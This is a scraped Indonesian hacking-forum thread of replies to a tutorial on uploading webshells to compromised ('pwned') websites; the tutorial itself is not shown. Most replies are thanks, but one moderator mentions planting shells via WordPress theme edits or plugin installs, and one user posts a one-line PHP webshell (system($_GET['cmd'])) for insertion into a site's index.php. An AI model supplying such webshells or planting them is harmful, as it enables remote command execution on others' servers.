Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[Tutorial] Upload webshell ke "pwned' site

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Re: [Tutorial] Upload webshell ke "pwned' site

Postby choiroel » Tue Aug 10, 2010 5:52 pm

ijin nge-TEST dulu.........
Ketika Agamamu dan aliranmu itu kamu dapatkan dari lahir...gak perlu sok merasa benar...doktrin dan dogma memang begitu
User avatar
choiroel
 
Posts: 106
Joined: Tue Jun 09, 2009 2:19 am
Location: Pati | Yogjakarta

Re: [Tutorial] Upload webshell ke "pwned' site

Postby Xshadow » Wed Aug 11, 2010 5:15 pm

kalau di wordpress... melalui jendela edit themes juga bisa... tergantung permissionnya... lewat install plugin juga bisa...
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare
User avatar
Xshadow
 
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com

Re: [Tutorial] Upload webshell ke "pwned' site

Postby Crash Senosci » Thu Apr 07, 2011 7:22 pm

Maaf kakak mau nanya... bagaimana cara menyisipkan webshell pada themenya...???
Crash Senosci
 
Posts: 1
Joined: Mon Mar 28, 2011 3:00 pm

Re: [Tutorial] Upload webshell ke "pwned' site

Postby luka » Wed Apr 13, 2011 10:02 pm

mohon izin utk ke tkp kk.. utk belajar.. :love: :love:
luka
 
Posts: 19
Joined: Sun Mar 27, 2011 8:41 am

Re: [Tutorial] Upload webshell ke "pwned' site

Postby apriliana » Fri Apr 29, 2011 11:53 pm

om ada yg tau code php yg disisipkan ke file punya adminnya yg bisa dijadikan php shell.
contohnya di index.phpnya disisipin kode ini,jadi di browser bisa kita panggil dengan :www.xxx.com/index.php?cmd=
klo tidak salah seperti ini ya :
<php
system($_GET['cmd'])
?>
itu script lengkapnya gimana ya?helep plzz,ga mudeng php ini
apriliana
 
Posts: 38
Joined: Mon Mar 26, 2007 2:02 am
Location: jogja

Re: [Tutorial] Upload webshell ke "pwned' site

Postby ritzalt » Sat Jun 04, 2011 5:40 pm

wew tips yang bagus nih mas bro buat nwebie kaya ane :mrgreen:
ritzalt
 
Posts: 4
Joined: Fri May 27, 2011 7:27 am

Re: [Tutorial] Upload webshell ke "pwned' site

Postby D90 » Thu Jun 09, 2011 11:02 pm

waaaw.....hanya dengan nongkrong disini gw bisa explore otak gw....
thx om atas tutor nya
D90
 
Posts: 1
Joined: Mon Jun 06, 2011 1:54 pm

Re: [Tutorial] Upload webshell ke "pwned' site

Postby adMit » Mon Jun 27, 2011 12:16 am

Keren bgt tutorial nya om poni.. :)
walaupun saya masih kurang ngerti juga sih.. soalnya webshell nya kedetek sama AV , jadi bingung deh mau ngapain.. -,-
Maklum, saya newbie om.. hehe..
Hanya seseorang yang ingin terus belajar.
adMit
 
Posts: 3
Joined: Sat Jun 25, 2011 6:10 am

Re: [Tutorial] Upload webshell ke "pwned' site

Postby hafidtz » Mon Aug 22, 2011 5:12 am

ijin copas om ke blog ane
hafidtz
 
Posts: 5
Joined: Sun Oct 31, 2010 3:29 pm

Re: [Tutorial] Upload webshell ke "pwned' site

Postby w3d4 » Sun Mar 03, 2013 6:30 pm

nah niee yg aku cari, aku pahami lu mastah
w3d4
 
Posts: 5
Joined: Wed Feb 24, 2010 6:25 pm

leave a comment

Previous

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 11 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id